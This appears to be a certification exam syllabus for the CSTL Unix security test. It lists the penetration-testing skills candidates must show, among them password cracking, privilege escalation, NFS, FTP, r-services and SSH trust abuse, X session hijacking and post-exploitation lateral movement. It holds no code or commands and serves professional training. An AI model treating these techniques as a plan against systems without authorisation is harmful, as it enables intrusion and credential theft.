CSTL UNIX Security Knowledge

Please click on the following tabs to reveal the knowledge depth required for a successful pass of the CSTL exam.

You will be given a random selection of questions. Please note exam content is subject to change due to circumstances beyond our control – use this as a guide and email us if you have any queries.

  • Can identify Unix hosts on a target network.
  • Can demonstrate and explain the enumeration of data from a variety of common network services on various platforms including:
    • Filesystems or resources shared remotely, such as NFS and SMB
    • SMTP • SSH • Telnet • SNMP and RID cycling
  • Is aware of legacy user enumeration techniques such as rusers and rwho.
  • Can enumerate RPC services and identify those with known security vulnerabilities.

  • Understands users, groups and password policies, including complexity requirements and lock-out.
  • Understands how to avoid causing a denial of service by locking-out accounts.
  • Understands UNIX password hashing algorithms and their associated security attributes.
  • Understands how passwords are stored and protected and can demonstrate how they can be recovered.
  • Understands and can demonstrate off-line password cracking using dictionary and brute-force attacks.
  • Can demonstrate the recovery of password hashes when given physical access to a UNIX host.
  • Understands the format of the passwd, shadow, group and gshadow files.

  • Understands and can demonstrate Local privilege escalation techniques, e.g. through the manipulation of insecure file system permissions.
  • Understands and can demonstrate the local exploitation of Solaris and Linux operating system vulnerabilities.

    • Understands and can demonstrate the remote exploitation of Solaris and Linux operating system vulnerabilities.
    • Understands and can demonstrate common post-exploitation activities, including:

      • Obtaining locally stored clear-text passwords• Password recovery (exfiltration and cracking)

      • Lateral movement

      • Checking OS and third party software application patch levels

      • Deriving a list of missing security patches

      • Reversion of OS and software components to previous state.

  • Understands FTP and can demonstrate how a poorly configured FTP server can be exploited, e.g. the downloading of arbitrary files, the uploading and over-writing of files, and the modification of file system permissions.
  • Understands the security implications of anonymous FTP access.
  • Understands TFTP and can demonstrate how a poorly configured TFTP server can be exploited, e.g. the downloading of arbitrary files, the uploading over-writing of files.
  • Understands and can exploit TFTP within a Cisco environment.
  • Understands NFS and its associated security attributes and can demonstrate how exports can be identified.
  • Can demonstrate how a poorly configured NFS service can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the creation of SUID-root files, the modification of files and file system permissions, and UID/GID manipulation.
  • Understands the concepts of root squashing, nosuid and noexec options.
  • Understands how NFS exports can be restricted at both a host and file level.

  • Understands the Berkeley r-services and their associated security attributes and can demonstrate how trust relationships can:

    • lead to the compromise of a server

    • allow a user to escalate privileges and/or gain further accessto a host, e.g. through the use, creation or modification of .rhosts and/or /etc/hosts.equiv files


  • Understand that SSH can be used for port forwarding and file transfer.
  • Understands SSH and its associated security attributes, including the different versions of the protocol, version finger printing and how the service can be used to provide a number of remote access services.
  • Can demonstrate how trust relationships can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the use, creation or modification of --/.ssh/authorized_keys files.
  • Demonstrate ability to use forward and reverse port forwarding.

  • Understands X and its associated security attributes, and can demonstrate how insecure sessions can be exploited, e.g. by obtaining screen shots, capturing keystrokes and injecting commands into open terminals.
  • Can describe the differences between X and %SYSRC and the typical use cases within a test.
  • Understands and can demonstrate valid username discovery via EXPN and VRFY.
  • Awareness of recent sendmail vulnerabilities and ability to exploit them if possible.
  • Understands mail relaying.

  • Understands backported patches, and the effect they have on scanning tools.
  • Understands OS lifecycle management.
  • Understands enterprise patching strategies for Linux.
  • Understands patching in air-gapped environments.
  • Understands security implications of installing software outside of OS package manager.
  • Understands the purpose of using sudo rather than logging in as root.
  • Understands the difference between sudo and su.
  • Demonstrates the ability to exploit weak sudo configuration.